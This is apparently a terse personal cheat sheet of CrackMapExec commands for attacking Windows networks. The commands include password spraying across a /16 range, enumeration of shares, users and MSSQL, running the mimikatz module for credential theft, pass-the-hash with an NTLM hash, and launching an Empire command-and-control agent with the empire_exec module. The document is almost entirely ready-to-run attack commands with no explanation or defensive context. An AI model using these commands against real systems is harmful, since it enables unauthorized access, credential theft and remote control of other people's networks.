crackmapexec X.X.0.0/16 -t 100 -u Administrator -p 'XXXXXX' -d WORKGROUP

crackmapexec X.X.X.139 -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP --shares --users --mssql

crackmapexec X.X.X.139 -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP -M mimikatz -o COMMAND=privilege::debug

crackmapexec X.X.X.X -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP --lusers --shares

crackmapexec ip_new.txt -t 100 -u Administrator -p 'XXXXXX' -d WORKGROUP

=== NEW ===

crackmapexec.py smb IPs.txt -u User -H 33445678902bbbe760ea1f1234567890 -M empire_exec -o LISTENER=CME

crackmapexe.py 10.10.10.10 -u dude -p /home/passfile.txt
